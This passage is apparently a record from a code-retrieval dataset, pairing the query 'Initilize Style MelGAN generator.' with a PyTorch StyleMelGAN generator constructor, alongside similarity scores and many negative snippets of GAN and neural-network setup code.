self.crossover_handlers_weights[i]\n\t\t\tself.crossover_handlers_weights[i] = cumsum/total", "def update_network(self, a, batch_size):\n for layer in self.layers:\n layer.weights_update(a, self.alpha, self.l2_lambda, batch_size)\n a = layer.a", "def init_weights(self):\n # Initialize weights\n self.apply(self._init_weights)", "def remove_norms(model: \"SqueezeWave\") -> \"SqueezeWave\":\n squeeze_wave = model\n for i, wn_layer in enumerate(squeeze_wave.wn_layers):\n squeeze_wave.wn_layers[i] = WN.remove_norms(wn_layer)\n return squeeze_wave", "def apply_batch_normalization(self, layer):\n if type(layer) is not BatchNormalization:\n raise ValueError('The `layer` must be neoml.Dnn.BatchNormalization.')\n\n self._internal.apply_batch_normalization(layer._internal)", "def normalize(w: torch.Tensor):\n\n if w.dim() > 1:\n return _matrix(w)\n\n return _vector(w)", "def init_weights(self, leveledinit: bool, kernel_size: int, bias: bool) -> None:\n if leveledinit:\n nn.init.normal_(self.conv1d.weight, std=1e-3)\n nn.init.normal_(self.conv1d.bias, std=1e-6)\n with torch.no_grad():\n self.conv1d.weight[:, 0, :] += 1.0 / kernel_size\n else:\n nn.init.xavier_uniform_(self.conv1d.weight)\n\n if self.embed in (\"pre\", \"post\"):\n nn.init.xavier_uniform_(self.embedding.weight)", "def normalize_layer(tensor, name, norm_use='bn'):\n if norm_use == \"gn\":\n x = GroupNorm(name=name + 'gn', groups=32)(tensor)\n elif norm_use == \"bn\":\n x = tf.keras.layers.BatchNormalization(axis=-1, name=name + 'bn', epsilon=1.001e-5)(tensor)\n elif norm_use == \"rbn\":\n x = tf.keras.layers.BatchNormalization(axis=-1, name=name + 'rbn', epsilon=1.001e-5, renorm=True)(tensor)\n elif norm_use == \"in\":\n x = InstanceNormalization(axis=-1, name=name + 'in')(tensor)\n else:\n x = tensor\n return x", "def _initialize_weights(self):\n for _, cell in self.cells_and_names():\n if isinstance(cell, nn.Conv2d):\n cell.weight.set_data(orthogonal(cell.weight.shape, 0.6))\n if cell.bias is not None:\n cell.bias.set_data(\n init.initializer(init.Constant(0.01), cell.bias.shape,\n cell.bias.dtype))", "def reset_weights(self):\n self.policy_backbone.reset_weights()\n self.value_backbone.reset_weights()\n self.action_head.reset_weights()\n self.critic_head.reset_weights()", "def init_weights(m: Union[torch.nn.Conv3d, torch.nn.BatchNorm3d]) -> None:\n import torch\n if isinstance(m, torch.nn.Conv3d):\n torch.nn.init.normal_(m.weight, 0, 0.01)\n elif isinstance(m, torch.nn.BatchNorm3d):\n torch.nn.init.constant_(m.weight, 1)\n torch.nn.init.constant_(m.bias, 0)", "def _init_layers(self) -> None:\n self.self_attn = MultiheadAttention(**self.self_attn_cfg)\n self.cross_attn = MultiheadAttention(**self.cross_attn_cfg)\n self.embed_dims = self.self_attn.embed_dims\n self.ffn = FFN(**self.ffn_cfg)\n norms_list = [\n build_norm_layer(self.norm_cfg, self.embed_dims)[1]\n for _ in range(3)\n ]\n self.norms = ModuleList(norms_list)" ]
[ "0.71435213", "0.71435213", "0.71435213", "0.7134102", "0.70675933", "0.70675933", "0.70535696", "0.7048801", "0.70298284", "0.6807073", "0.67789346", "0.6764012", "0.6759336", "0.67359823", "0.671116", "0.6696031", "0.6583814", "0.6554803", "0.65268165", "0.65178454", "0.6516569", "0.6463748", "0.64564633", "0.64395547", "0.6430028", "0.6421856", "0.640334", "0.63897395", "0.6374966", "0.6365222", "0.63641244", "0.6354269", "0.6340741", "0.6338719", "0.63375056", "0.6309535", "0.62983793", "0.62983793", "0.6297496", "0.6296494", "0.62862206", "0.62776047", "0.62717974", "0.627027", "0.6268798", "0.6264878", "0.6216303", "0.6194924", "0.61866164", "0.61798894", "0.61327094", "0.61231303", "0.6123015", "0.61202216", "0.6115392", "0.60985583", "0.6084887", "0.60684794", "0.6061884", "0.60574734", "0.6041368", "0.6030597", "0.60133255", "0.6010806", "0.6009379", "0.6008268", "0.6008268", "0.60043484", "0.59894454", "0.59836566", "0.59775686", "0.59664863", "0.59664863", "0.59540474", "0.5954036", "0.5951746", "0.5950169", "0.5947529", "0.5942369", "0.59406936", "0.5939528", "0.5939528", "0.5936708", "0.59348613", "0.5908261", "0.59041584", "0.59008473", "0.5899256", "0.5888492", "0.588707", "0.58829534", "0.5882231", "0.5871732", "0.5871084", "0.5860187", "0.585934", "0.585585", "0.58556217" ]
0.7316938
2
Initilize Style MelGAN generator.
def __init__( self, in_channels=128, aux_channels=128, channels=64, out_channels=1, num_embs=100, num_spk_embs=128, spk_emb_dim=128, concat_spk_emb=False, kernel_size=9, dilation=2, bias=True, noise_upsample_scales=[11, 2, 2, 2], noise_upsample_activation="LeakyReLU", noise_upsample_activation_params={"negative_slope": 0.2}, upsample_scales=[2, 2, 2, 2, 2, 2, 2, 2, 1], upsample_mode="nearest", gated_function="softmax", use_weight_norm=True, ): super().__init__() self.in_channels = in_channels # define id embedding self.emb = torch.nn.Embedding( num_embeddings=num_embs, embedding_dim=aux_channels ) self.spk_emb = torch.nn.Embedding( num_embeddings=num_spk_embs, embedding_dim=spk_emb_dim ) self.concat_spk_emb = concat_spk_emb if not concat_spk_emb: assert aux_channels == spk_emb_dim else: aux_channels = aux_channels + spk_emb_dim noise_upsample = [] in_chs = in_channels for noise_upsample_scale in noise_upsample_scales: # NOTE(kan-bayashi): How should we design noise upsampling part? noise_upsample += [ torch.nn.ConvTranspose1d( in_chs, channels, noise_upsample_scale * 2, stride=noise_upsample_scale, padding=noise_upsample_scale // 2 + noise_upsample_scale % 2, output_padding=noise_upsample_scale % 2, bias=bias, ) ] noise_upsample += [ getattr(torch.nn, noise_upsample_activation)( **noise_upsample_activation_params ) ] in_chs = channels self.noise_upsample = torch.nn.Sequential(*noise_upsample) self.noise_upsample_factor = np.prod(noise_upsample_scales) self.blocks = torch.nn.ModuleList() aux_chs = aux_channels for upsample_scale in upsample_scales: self.blocks += [ TADEResBlock( in_channels=channels, aux_channels=aux_chs, kernel_size=kernel_size, dilation=dilation, bias=bias, upsample_factor=upsample_scale, upsample_mode=upsample_mode, gated_function=gated_function, ), ] aux_chs = channels self.upsample_factor = np.prod(upsample_scales) self.output_conv = torch.nn.Sequential( torch.nn.Conv1d( channels, out_channels, kernel_size, 1, bias=bias, padding=(kernel_size - 1) // 2, ), torch.nn.Tanh(), ) # apply weight norm if use_weight_norm: self.apply_weight_norm() # reset parameters self.reset_parameters()
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def model_setup(self):\n self.DNN = SganMLP(self.settings.number_of_bins)\n self.D = SganMLP(self.settings.number_of_bins)\n self.G = Generator()", "def model_setup(self):\n self.DNN = DgganMLP(self.settings.hidden_size)\n self.D = DgganMLP(self.settings.hidden_size)\n self.G = Generator(self.settings.hidden_size)", "def build_model(cls, args):\n base_architecture(args) \n return StyleGANGeneratorPretrain(args)", "def init_net(self):\r\n # initialize the generator network\r\n g_net = Net(\r\n self.architecture['generator'], net_name='gen',\r\n data_format=FLAGS.IMAGE_FORMAT, num_class=self.num_class)\r\n # define layer connections in generator\r\n self.Gen = Routine(g_net)\r\n self.Gen.add_input_layers([64, self.code_size], [0])\r\n self.Gen.seq_links(list(range(g_net.num_layers)))\r\n self.Gen.add_output_layers([g_net.num_layers - 1])\r\n\r\n # initialize the generator network\r\n d_net = Net(\r\n self.architecture['discriminator'], net_name='dis',\r\n data_format=FLAGS.IMAGE_FORMAT, num_class=self.num_class)\r\n # define layer connections in generator\r\n self.Dis = Routine(d_net)\r\n self.Dis.add_input_layers([64] + list(self.architecture['input'][0]), [0])\r\n self.Dis.seq_links(list(range(d_net.num_layers)))\r\n self.Dis.add_output_layers([d_net.num_layers - 1])", "def initialize(self):\n self.write_model(path=PATH.GRAD, suffix='new')\n\n if PAR.RANDOM_OVER_IT or optimize.iter == 1:\n self.get_random_frequencies()\n\n print('Generating synthetics')\n system.run('solver', 'eval_func',\n hosts='all',\n path=PATH.GRAD)\n\n self.write_misfit(path=PATH.GRAD, suffix='new')", "def __init__(self, **kwargs: dict) -> None:\n super(AnimeGAN_v2, self).__init__()\n self.model_name: str = 'animeGAN_v2'\n self.model_version: str = '1.0.0'\n \n self.pretrained_model_path: str = kwargs['pretrained_model_path']\n\n self.device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n torch.set_grad_enabled(False)\n\n self.model = Generator().eval().to(self.device)\n ckpt = torch.load(self.pretrained_model_path, map_location=self.device)\n self.model.load_state_dict(ckpt)", "def __init__(self, model_name, logger=None, gpu_ids=None):\n super().__init__(model_name, 'generator', logger, gpu_ids)", "def __init__(self, random_generator: RandomState):\n super().__init__([MoldelStacker(random_generator), SocialMediaLayer()])", "def __init__(self, use_wasserstein=True):\n\n opt = WassersteinCycleGANTestOptions if use_wasserstein else CycleGANTestOptions\n\n opt.checkpoints_dir = os.path.join(\n pathlib.Path(__file__).parent.absolute(), opt.checkpoints_dir\n )\n\n tf_properties = {\n \"load_size\": opt.load_size,\n \"crop_size\": opt.crop_size,\n \"preprocess\": opt.preprocess,\n \"mask\": os.path.join(os.path.dirname(__file__), opt.mask),\n \"no_flip\": True,\n \"grayscale\": True,\n }\n self.transform = get_transform(**tf_properties)\n\n self.device = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\n\n if opt.is_wgan:\n netg_b_to_a = resnet_generator.ResnetGenerator(\n opt.input_nc,\n opt.output_nc,\n opt.ngf,\n get_norm_layer(opt.norm),\n dilations=opt.dilations,\n conv_layers_in_block=opt.conv_layers_in_block,\n )\n else:\n netg_b_to_a = generator.create_generator(\n opt.input_nc,\n opt.output_nc,\n opt.ngf,\n opt.netg,\n opt.norm,\n not opt.no_dropout,\n opt.activation,\n opt.conv_layers_in_block,\n opt.dilations,\n )\n\n netg_b_to_a = init_net(netg_b_to_a, opt.init_type, opt.init_gain, self.device)\n\n ModelClass = CycleGANModel if not opt.is_wgan else WassersteinCycleGANModel\n\n self.model = ModelClass.from_dict(\n netg_a_to_b=None, netg_b_to_a=netg_b_to_a, **opt.to_dict()\n )\n\n self.model.networks.load(\n os.path.join(opt.checkpoints_dir, opt.name, f\"{opt.epoch}_net_\"),\n device=self.device,\n )\n self.model.eval()", "def build_gan(self):\n\n # Specify te generators used to build various components.\n optimizer_generator = Adam(0.0002, 0.5)\n optimizer_discriminator = Adam(0.0002, 0.5)\n optimizer_GAN = Adam(0.0002, 0.5)\n\n loss_measure_generator = \"binary_crossentropy\"\n loss_measure_discriminator = \"binary_crossentropy\"\n loss_measure_GAN = \"binary_crossentropy\"\n\n metrics = [\"accuracy\", \"mae\", \"mse\", \"mape\", \"cosine\"]\n\n # See if the specified model paths exist, if they don't then we start training new models\n if (\n hasattr(self, \"discriminator_path\")\n and hasattr(self, \"generator_path\")\n and self.discriminator_path.is_file()\n and self.generator_path.is_file()\n ):\n self.discriminator = load_model(self.discriminator_path)\n self.generator = load_model(self.generator_path)\n print(\"Loaded models...\")\n else: # training new model.\n print(\"Training models...\")\n\n # Generate the tensorboard and its call back\n callback_tensorboard = TensorBoard(\n log_dir=path_log_run, histogram_freq=0, write_images=True\n )\n\n # self.callbacks_list = [callback_tensorboard]\n\n # Build discriminator and compile it.\n self.discriminator = self.build_discriminator()\n\n # Training discriminator!\n self.discriminator.compile(\n loss=loss_measure_discriminator,\n optimizer=optimizer_discriminator,\n # metrics=metrics,\n # callbacks=self.callbacks_list,\n )\n\n # Build generator and compile it.\n self.generator = self.build_generator()\n\n # Training generator!\n self.generator.compile(\n loss=loss_measure_generator,\n optimizer=optimizer_generator,\n # callbacks=self.callbacks_list,\n )\n\n # These next few lines setup the training for the GAN, which the input Vector has a shape of noise_parameters\n z = Input(shape=(self.dimensions_noise,))\n img = self.generator(z)\n\n self.discriminator.trainable = False\n\n # Call the discriminator on the image generated by the generator.\n # Store the output\n valid = self.discriminator(img)\n\n # Form a model that combine both the input and the output pair.\n self.combined = Model(z, valid)\n\n # Compile the model using binary_crossentropy with the\n self.combined.compile(loss=loss_measure_GAN, optimizer=optimizer_GAN)", "def __init__(self, generator, discriminator, noise_dim, save_path):\n self.generator = generator\n self.discriminator = discriminator\n self.noise_dim = noise_dim\n self.save_path = save_path\n self.check_points_path = os.path.join(save_path, 'check_points')\n self.output_image_path = os.path.join(save_path, 'images_during_training')\n self.generator.generate()", "def setup(self):\n\n self.points = [[0.360502, 0.535494],\n [0.476489, 0.560185],\n [0.503125, 0.601218],\n [0.462382, 0.666667],\n [0.504702, 0.5]]\n self.max_neighbors = 4\n self.beta = 1\n self.graph = 'beta skeleton'\n self.edges = [0, 1, 0, 2, 0, 3, 0, 4,\n 1, 3, 1, 4,\n 2, 3, 2, 4,\n 3, 4]", "def init_batch(self):\n pass", "def init():", "def setGenerators(self):\n shape = (self.input_shape[0],self.input_shape[1])\n self.trainGen,self.validateGen = getBatchGenerators(self.batch_size,\n self.dataPath,\n shape,\n self.classMap,\n self.regression)", "def initialise_theano_rng(self):\n\n\t\tself.theano_rng = RandomStreams(self.rng.randint(2**30))", "def init_fn(init_savers, sess):\n ## Load Generator weights from MaskGAN checkpoint.\n if FLAGS.maskgan_ckpt:\n print('Restoring Generator from %s.' % FLAGS.maskgan_ckpt)\n tf.logging.info('Restoring Generator from %s.' % FLAGS.maskgan_ckpt)\n print('Asserting Generator is a seq2seq-variant.')\n tf.logging.info('Asserting Generator is a seq2seq-variant.')\n assert FLAGS.generator_model.startswith('seq2seq')\n init_saver = init_savers['init_saver']\n init_saver.restore(sess, FLAGS.maskgan_ckpt)\n\n ## Load the Discriminator weights from the MaskGAN checkpoint if\n # the weights are compatible.\n print('Restoring Discriminator from %s.' % FLAGS.maskgan_ckpt)\n tf.logging.info('Restoring Discriminator from %s.' % FLAGS.maskgan_ckpt)\n dis_init_saver = init_savers['dis_init_saver']\n dis_init_saver.restore(sess, FLAGS.maskgan_ckpt)\n\n else:\n return", "def initialisation(self):\n self.create_variables()\n self.create_placeholders()\n self.build_model()\n self.reset_lr(None, True)\n self.build_loss()\n self.initialised = True", "def load_generator(\n ckpt, is_stylegan1, G_res, out_size, noconst, latent_dim, n_mlp, channel_multiplier, dataparallel, base_res_factor\n):\n if is_stylegan1:\n generator = G_style(output_size=out_size, checkpoint=ckpt).cuda()\n else:\n generator = Generator(\n G_res,\n latent_dim,\n n_mlp,\n channel_multiplier=channel_multiplier,\n constant_input=not noconst,\n checkpoint=ckpt,\n output_size=out_size,\n base_res_factor=base_res_factor,\n ).cuda()\n if dataparallel:\n generator = th.nn.DataParallel(generator)\n return generator", "def initialize(self):\n logger.debug(\"Begin Generation\")\n self.events.begin_generation()", "def initialize(self, parser):\n # basic parameters\n parser.add_argument('--name', type=str, default='cyclegan',\n help='name of the experiment. It decides where to store samples and models')\n parser.add_argument('--gpu_ids', type=str, default='0', help='gpu ids: e.g. 0 0,1,2, 0,2. use -1 for CPU')\n parser.add_argument('--checkpoints_dir', type=str, default='../ckpts7', help='models are saved here')\n # model parameters\n parser.add_argument('--model', type=str, default='cycle_gan_3d',\n help='chooses which model to use. [cycle_gan_3d | cycle_gan_2d_slice | test ]')\n parser.add_argument('--input_nc', type=int, default=1,\n help='# of input image channels: 3 for RGB and 1 for grayscale')\n parser.add_argument('--output_nc', type=int, default=1,\n help='# of output image channels: 3 for RGB and 1 for grayscale')\n parser.add_argument('--f_map', type=list, default=[16, 32, 64, 128], help='# of gen filters in the last conv layer')\n parser.add_argument('--ngf', type=int, default=64, help='# of gen filters in the last conv layer')\n parser.add_argument('--ndf', type=int, default=64, help='# of discrim filters in the first conv layer')\n parser.add_argument('--netD', type=str, default='basic',\n help='specify discriminator architecture [basic | n_layers | pixel]. The basic model is a 70x70 PatchGAN. n_layers allows you to specify the layers in the discriminator')\n parser.add_argument('--typeG', type=str, default='unet',\n help='specify generator architecture [unet | resunet ]')\n parser.add_argument('--n_layers_D', type=int, default=4, help='only used if netD==n_layers')\n parser.add_argument('--norm', type=str, default='instance',\n help='instance normalization or batch normalization [instance | batch | none]')\n parser.add_argument('--init_type', type=str, default='normal',\n help='network initialization [normal | xavier | kaiming | orthogonal]')\n parser.add_argument('--init_gain', type=float, default=0.02,\n help='scaling factor for normal, xavier and orthogonal.')\n parser.add_argument('--no_dropout', action='store_true', help='no dropout for the generator')\n # dataset parameters\n parser.add_argument('--direction', type=str, default='AtoB', help='AtoB or BtoA')\n parser.add_argument('--serial_batches', action='store_true',\n help='if true, takes images in order to make batches, otherwise takes them randomly')\n parser.add_argument('--num_threads', default=4, type=int, help='# threads for loading data')\n parser.add_argument('--batch_size', type=int, default=16, help='input batch size')\n parser.add_argument('--crop_size', type=int, default=16, help='then crop to this size')\n parser.add_argument('--thickness', type=int, default=3, help='thickness when doing the cropping')\n parser.add_argument('--max_dataset_size', type=int, default=float(\"inf\"),\n help='Maximum number of samples allowed per dataset. If the dataset directory contains more than max_dataset_size, only a subset is loaded.')\n parser.add_argument('--preprocess', type=str, default='resize_and_crop',\n help='scaling and cropping of images at load time [resize_and_crop | crop | scale_width | scale_width_and_crop | none]')\n parser.add_argument('--no_flip', action='store_true',\n help='if specified, do not flip the images for data augmentation')\n parser.add_argument('--display_winsize', type=int, default=256,\n help='display window size for both visdom and HTML')\n # additional parameters\n parser.add_argument('--epoch', type=str, default='latest',\n help='which epoch to load? set to latest to use latest cached model')\n parser.add_argument('--load_iter', type=int, default='0',\n help='which iteration to load? if load_iter > 0, the code will load models by iter_[load_iter]; otherwise, the code will load models by [epoch]')\n parser.add_argument('--verbose', action='store_true', help='if specified, print more debugging information')\n parser.add_argument('--suffix', default='', type=str,\n help='customized suffix: opt.name = opt.name + suffix: e.g., {model}_{netG}_size{load_size}')\n parser.add_argument('--lambda_A', type=float, default=10.0, help='weight for cycle loss (A -> B -> A)')\n parser.add_argument('--lambda_B', type=float, default=10.0, help='weight for cycle loss (B -> A -> B)')\n parser.add_argument('--lambda_identity', type=float, default=0.5,\n help='use identity mapping. Setting lambda_identity other than 0 has an effect of scaling the weight of the identity mapping loss. For example, if the weight of the identity loss should be 10 times smaller than the weight of the reconstruction loss, please set lambda_identity = 0.1')\n parser.add_argument('--dim', type=int, default=2, help='2|3')\n parser.add_argument('--dataset', type=str, default='adni',help='select a dataset')\n parser.add_argument('--lambda_cc', type=float, default=0.5,help='use correlation coefficient loss if larger than 0')\n parser.add_argument('--lambda_tv', type=float, default=0.5,help='use total variance regularization if larger than 0')\n parser.add_argument('--fid', action='store_true',help='calculate frechet inception distance')\n parser.add_argument('--srenorm', action='store_true',help='using spatial adaptive denormalization')\n parser.add_argument('--joint_seg', action='store_true',help='learning segmentation instead of input segmentation map, and using spatial adaptive denormalization')\n parser.add_argument('--prob_seg', action='store_true',help='segmentation map is a probability')\n parser.add_argument('--load_epoch', type=int, default=0, help='continue training: the epoch to continue from')\n parser.add_argument('--load_step', type=int, default=0, help='continue training: the step to continue from')\n parser.add_argument('--sem_dropout', action='store_true', help='semantic dropout or not')\n parser.add_argument('--seg_nc', type=int, default=4, help='number of semantic class')\n parser.add_argument('--fold', type=float, default=0, help='fold id for LOOCV')\n parser.add_argument('--mask', action='store_true',help='add mask for brain')\n\n self.initialized = True\n return parser", "def __init__(self, gen):\n self.gen = gen", "def init():\n ########################\n # OPTIONS\n ########################\n # Debugging tools\n global TIMER # displays time of every major step\n TIMER = True\n global MONITOR # displays monitoring infos\n MONITOR = False\n \n global directories\n directories = {'1Face': 'data/1Face/',\n '2Faces': 'data/2Faces/',\n '3Faces': 'data/3Faces/',\n 'test': 'data/test/'}\n \n # Opt. swicthes\n global maxfinder # to find the max dim. amongst the pictures\n maxfinder = False\n global ML_mode\n ML_mode = {'CNN_Train': False,\n 'CNN_Pred' : True,\n 'Sampler': True}\n \n # Global variables\n global num_pics\n num_pics = {'1Face': 0,\n '2Faces': 0,\n '3Faces': 0}\n global labels\n labels = {'1Face': 0,\n '2Faces': 1,\n '3Faces': 2}\n global num_data\n num_data = 0\n global splitsize # Fraction of data to build the training set\n splitsize = 0.7 \n global maxheight # Resize the pictures to a power of 2 for CNN (2^8 here)\n maxheight = 128\n global maxwidth\n maxwidth = 128\n global TreshEdge # Number of consecutive black pixels to define an edge\n TreshEdge = 2\n global TreshFace # Number of white pixels to define a face (or large edge)\n TreshFace = maxheight/16", "def __init__(self):\n\n self.gm = GradientMapper()\n self.im = SpringMapper()\n self.fm = FullMapper(self.im, self.gm)\n # self.lm = LineMapper(self.fm)\n self.exit = False", "def __init__(self, hparams):\n # init superclass\n super(FastNeuralStyleSystem, self).__init__()\n self.hparams = hparams\n torch.manual_seed(hparams.seed)\n np.random.seed(hparams.seed)\n\n self.batch_size = hparams.batch_size\n if hparams.model == \"hrnet\":\n self.style_model = HRNet()\n else:\n self.style_model = TransformerNet()\n self.vgg_extractor = Vgg16(requires_grad=False)\n\n self.transform = transforms.Compose([\n transforms.Resize(hparams.image_size),\n transforms.CenterCrop(hparams.image_size),\n transforms.ToTensor(),\n transforms.Lambda(lambda x: x.mul(255))\n ])\n\n self.style_transform = transforms.Compose([\n transforms.Resize(hparams.image_size),\n transforms.CenterCrop(hparams.image_size),\n transforms.ToTensor(),\n transforms.Lambda(lambda x: x.mul(255))\n ])\n\n content_image = utils.load_image(\n self.hparams.content_image, scale=self.hparams.content_scale)\n self.content_image = self.style_transform(content_image)\n\n style = utils.load_image(os.path.join(\n 'images', 'style-images', f'{hparams.style_image}.jpg'), scale=0.5)\n style = self.style_transform(style).requires_grad_(False)\n self.style_image = style.repeat(hparams.batch_size, 1, 1, 1)\n\n self.features_style = self.vgg_extractor(\n utils.normalize_batch(self.style_image))\n self.gram_style = [utils.gram_matrix(y) for y in self.features_style]\n\n # self.temp_dir = f\"{self.hparams.output_dir}/{self.hparams.style_image}_steps_c_{self.hparams.content_weight}_s_{self.hparams.style_weight}\"\n # os.makedirs(self.temp_dir, exist_ok=True)", "def __init__(self, latent_dim=helpers.LATENT_DIM_IMG, img_size=helpers.IMG_SIZE, channels=helpers.CHANNELS):\n super(Generator, self).__init__()\n\n def block(in_feat, out_feat, normalize=True):\n layers = [nn.Linear(in_feat, out_feat)]\n if normalize:\n layers.append(nn.BatchNorm1d(out_feat, 0.8))\n layers.append(nn.LeakyReLU(0.2, inplace=True))\n return layers\n\n self.img_size = img_size\n self.channels = channels\n self.model = nn.Sequential(\n\n *block(latent_dim, 64, normalize=False),\n *block(64, 128),\n *block(128, 256),\n *block(256, 512),\n *block(512, 1024),\n nn.Linear(1024, channels*img_size*img_size),\n nn.Tanh()\n )", "def __init__(self, num_gpus):\n\n super(Generator, self).__init__()\n n_in = Z\n n_out = IMG_CHANNELS\n\n feature_map = IMG_SIZE\n kernel_size = 4\n stride = 2\n padding = 1\n bias = False\n\n self.num_gpus = num_gpus\n\n self.network = nn.Sequential(\n # input is latent variable space Z\n nn.ConvTranspose2d(n_in, feature_map * 8, kernel_size, 1, 0, bias=bias),\n nn.BatchNorm2d(feature_map * 8),\n nn.ReLU(inplace=True),\n\n # nodes = feature_map * 4\n nn.ConvTranspose2d(feature_map * 8, feature_map * 4, kernel_size, stride, padding, bias=bias),\n nn.BatchNorm2d(feature_map * 4),\n nn.ReLU(inplace=True),\n\n # nodes = feature_map * 2\n nn.ConvTranspose2d(feature_map * 4, feature_map * 2, kernel_size, stride, padding, bias=bias),\n nn.BatchNorm2d(feature_map * 2),\n nn.ReLU(inplace=True),\n\n # nodes = feature_map\n nn.ConvTranspose2d(feature_map * 2, feature_map, kernel_size, stride, padding, bias=bias),\n nn.BatchNorm2d(feature_map),\n nn.ReLU(inplace=True),\n\n # nodes = output image size\n nn.ConvTranspose2d(feature_map, n_out, kernel_size, stride, padding, bias=bias),\n nn.Tanh()\n )", "def build_gan(self):\n # make weights in the discriminator not trainable\n self.d_model.trainable = False\n # get noise and label inputs from generator model\n gen_noise, gen_label = self.g_model.input\n # get image output from the generator model\n gen_output = self.g_model.output\n # connect image output and label input from generator as inputs to discriminator\n gan_output = self.d_model([gen_output, gen_label])\n # define gan model as taking noise and label and outputting a classification\n self.gan_model = Model([gen_noise, gen_label], gan_output)\n # compile model\n opt = Adam(lr=0.0002, beta_1=0.5)\n self.gan_model.compile(loss='binary_crossentropy', optimizer=opt)", "def __init__(self, config, set_name, preprocess_image):\n\t\t\tself.data_dir = config['data_dir']\n\t\t\tself.set_name = set_name\n\t\t\tself.coco = COCO(os.path.join(self.data_dir, 'annotations', 'instances_' + set_name + '.json'))\n\t\t\tself.image_ids = self.coco.getImgIds()\n\t\t\tself.mask = config['mask']\n\n\t\t\tself.load_classes()\n\n\t\t\tsuper(CocoGenerator, self).__from_config__(config, preprocess_image=preprocess_image)", "def init():\n pass", "def create(self):\n # Create a graph and add all layers\n self.graph = tf.Graph()\n with self.graph.as_default():\n # Define variable learning rate and dis_noise\n self.relative_lr = tf.placeholder_with_default([1.],[1],name=\"relative_lr\")\n self.relative_lr = self.relative_lr[0]\n \n self.rel_dis_noise = tf.placeholder_with_default([1.],[1],name=\"rel_dis_noise\")\n self.rel_dis_noise = self.rel_dis_noise[0]\n self.dis_noise = self.rel_dis_noise * self.dis_noise_0\n \n \n # Create the generator and discriminator\n if self.architecture == 'Res6':\n gen_dim = [64, 128,256, 256,256,256,256,256,256, 128,64 ]\n kernel_size =[7, 3,3, 3,3,3,3,3,3, 3,3, 7]\n elif self.architecture == 'Res9':\n gen_dim= [64, 128,256, 256,256,256,256,256,256,256,256,256, 128,64 ]\n kernel_size=[7, 3,3, 3,3,3,3,3,3,3,3,3, 3,3, 7]\n else:\n print('Unknown generator architecture')\n return None\n \n self.genA = Res_Gen.ResGen('BtoA',self.a_chan,gen_dim=gen_dim,kernel_size=kernel_size,deconv=self.deconv,verbose=self.verbose)\n self.genB = Res_Gen.ResGen('AtoB',self.b_chan,gen_dim=gen_dim,kernel_size=kernel_size,deconv=self.deconv,verbose=self.verbose)\n \n if self.patchgan == 'Patch34':\n self.disA = PatchGAN34.PatchGAN34('A',noise=self.dis_noise)\n self.disB = PatchGAN34.PatchGAN34('B',noise=self.dis_noise)\n elif self.patchgan == 'Patch70':\n self.disA = PatchGAN70.PatchGAN70('A',noise=self.dis_noise)\n self.disB = PatchGAN70.PatchGAN70('B',noise=self.dis_noise)\n elif self.patchgan == 'Patch142':\n self.disA = PatchGAN142.PatchGAN142('A',noise=self.dis_noise)\n self.disB = PatchGAN142.PatchGAN142('B',noise=self.dis_noise)\n elif self.patchgan == 'MultiPatch':\n self.disA = MultiPatch.MultiPatch('A',noise=self.dis_noise)\n self.disB = MultiPatch.MultiPatch('B',noise=self.dis_noise)\n else:\n print('Unknown Patch discriminator type')\n return None\n \n self.disA_His = HisDis.HisDis('A',noise=self.dis_noise,keep_prob=1.)\n self.disB_His = HisDis.HisDis('B',noise=self.dis_noise,keep_prob=1.)\n \n # Create a placeholder for the input data\n self.A = tf.placeholder(tf.float32,[None, None, None, self.a_chan],name=\"a\")\n self.B = tf.placeholder(tf.float32,[None, None, None, self.b_chan],name=\"b\")\n \n if self.verbose:\n print('Size A: ' +str(self.a_chan)) # Often 1 --> Real\n print('Size B: ' +str(self.b_chan)) # Often 3 --> Syn\n \n # Create cycleGAN \n \n self.fake_A = self.genA.create(self.B,False)\n self.fake_B = self.genB.create(self.A,False)\n \n \n \n # Define the histogram loss\n t_A = tf.transpose(tf.reshape(self.A,[-1, self.a_chan]),[1,0])\n t_B = tf.transpose(tf.reshape(self.B,[-1, self.b_chan]),[1,0])\n t_fake_A = tf.transpose(tf.reshape(self.fake_A,[-1, self.a_chan]),[1,0])\n t_fake_B = tf.transpose(tf.reshape(self.fake_B,[-1, self.b_chan]),[1,0])\n\n self.s_A,_ = tf.nn.top_k(t_A,tf.shape(t_A)[1])\n self.s_B,_ = tf.nn.top_k(t_B,tf.shape(t_B)[1])\n self.s_fake_A,_ = tf.nn.top_k(t_fake_A,tf.shape(t_fake_A)[1])\n self.s_fake_B,_ = tf.nn.top_k(t_fake_B,tf.shape(t_fake_B)[1])\n \n self.m_A = tf.reshape(tf.reduce_mean(tf.reshape(self.s_A,[self.a_chan, self.imsize, -1]),axis=2),[1, -1])\n self.m_B = tf.reshape(tf.reduce_mean(tf.reshape(self.s_B,[self.b_chan, self.imsize, -1]),axis=2),[1, -1])\n self.m_fake_A = tf.reshape(tf.reduce_mean(tf.reshape(self.s_fake_A,[self.a_chan, self.imsize, -1]),axis=2),[1, -1])\n self.m_fake_B = tf.reshape(tf.reduce_mean(tf.reshape(self.s_fake_B,[self.b_chan, self.imsize, -1]),axis=2),[1, -1])\n \n # Define generator loss functions\n self.lambda_c = tf.placeholder_with_default([self.lambda_c],[1],name=\"lambda_c\")\n self.lambda_c = self.lambda_c[0]\n self.lambda_h = tf.placeholder_with_default([self.lambda_h],[1],name=\"lambda_h\")\n self.lambda_h = self.lambda_h[0]\n \n self.dis_real_A = self.disA.create(self.A,False)\n self.dis_real_Ah = self.disA_His.create(self.m_A,False)\n self.dis_real_B = self.disB.create(self.B,False)\n self.dis_real_Bh = self.disB_His.create(self.m_B,False)\n self.dis_fake_A = self.disA.create(self.fake_A,True)\n self.dis_fake_Ah = self.disA_His.create(self.m_fake_A,True)\n self.dis_fake_B = self.disB.create(self.fake_B,True)\n self.dis_fake_Bh = self.disB_His.create(self.m_fake_B,True)\n \n self.cyc_A = self.genA.create(self.fake_B,True)\n self.cyc_B = self.genB.create(self.fake_A,True)\n \n \n # Define cycle loss (eq. 2)\n self.loss_cyc_A = tf.reduce_mean(tf.abs(self.cyc_A-self.A))\n self.loss_cyc_B = tf.reduce_mean(tf.abs(self.cyc_B-self.B))\n \n self.loss_cyc = self.loss_cyc_A + self.loss_cyc_B\n \n # Define discriminator losses (eq. 1)\n self.loss_dis_A = (tf.reduce_mean(tf.square(self.dis_real_A)) +\\\n 